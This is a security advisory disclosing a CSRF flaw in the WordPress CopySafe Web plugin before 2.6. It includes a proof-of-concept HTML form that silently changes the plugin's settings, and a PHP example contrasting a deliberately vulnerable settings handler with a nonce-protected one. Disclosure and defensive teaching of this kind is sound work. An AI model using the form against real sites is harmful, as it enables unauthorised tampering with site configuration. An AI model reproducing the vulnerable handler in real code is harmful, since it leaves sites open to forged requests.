WordPress CopySafe Web Cross Site Request Forgery

2017-04-07T00:00:00
ID PACKETSTORM:142050
Type packetstorm
Reporter Zhiyang Zeng
Modified 2017-04-07T00:00:00

Description

Details
=======
  
  
Software: CopySafe Web

Version: < 2.6

Description: Adds copy protection against PrintScreen and screen capture. CopySafe Web uses encrypted images and a domain lock to extend copy protection to all media displayed on a web page.
  
  
Description
===========

A CSRF vulnerability in the WordPress CopySafe Web plugin allows an attacker to change the plugin's settings by way of a forged request to the settings page.
  
PoC
===

<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
  <input type="text" name="admin_only" value="checked">
  <input type="text" name="asps" value="">
  <input type="text" name="upload_path" value="">
  <input type="text" name="max_size" value="">
  <input type="text" name="mode" value="checked">
  <input type="text" name="submit" value="Save Settings">
  <input type="submit">
</form>
  
Mitigations
===========
  
Disable the plugin until a new version is released that fixes this bug.  
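To illustrate the class of fix (added example, not code from the plugin or the advisory): a settings handler that trusts any POST carrying the PoC's field names, beside a hardened handler that requires the manage_options capability and a WordPress nonce, so a form submitted from another origin is rejected before update_option() runs. The wpcsw_* function names, the option key and the nonce action are hypothetical; wp_nonce_field(), check_admin_referer(), current_user_can() and the sanitizers are standard WordPress API.

```php
// Added example, not the plugin's code. The wpcsw_* names, option key and
// nonce action are hypothetical; field names match the PoC form above.

// Vulnerable pattern: any POST reaching admin.php?page=wpcsw_settings is
// trusted, so an admin lured onto a third-party page saves forged values.
function wpcsw_save_settings_vulnerable() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['submit'] ) ) {
        return;
    }
    $opts = array(
        'admin_only'  => $_POST['admin_only'],
        'asps'        => $_POST['asps'],
        'upload_path' => $_POST['upload_path'],
        'max_size'    => $_POST['max_size'],
        'mode'        => $_POST['mode'],
    );
    update_option( 'wpcsw_settings', $opts );
}

// Hardened pattern: the form carries a nonce bound to this action and the
// user's session, and the user must hold the capability. A cross-site form
// cannot know the nonce, so check_admin_referer() stops the request.
function wpcsw_render_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=wpcsw_settings' ) ) . '">';
    wp_nonce_field( 'wpcsw_save_settings', 'wpcsw_nonce' );
    // ... the settings inputs (admin_only, asps, upload_path, max_size, mode) ...
    submit_button( 'Save Settings' ); // emits <input type="submit" name="submit">
    echo '</form>';
}

function wpcsw_save_settings_hardened() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['submit'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'wpcsw_save_settings', 'wpcsw_nonce' ); // CSRF check
    $opts = array(
        'admin_only'  => isset( $_POST['admin_only'] ) ? 1 : 0,
        'asps'        => sanitize_text_field( wp_unslash( $_POST['asps'] ?? '' ) ),
        'upload_path' => sanitize_text_field( wp_unslash( $_POST['upload_path'] ?? '' ) ),
        'max_size'    => absint( $_POST['max_size'] ?? 0 ),
        'mode'        => isset( $_POST['mode'] ) ? 1 : 0,
    );
    update_option( 'wpcsw_settings', $opts );
}
```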
  
Fixed
=====
  
Fixed in release 2.6; see the changelog at https://wordpress.org/plugins/wp-copysafe-web/
  
Best regards,  
Zhiyang Zeng of Tencent security platform department  
  
  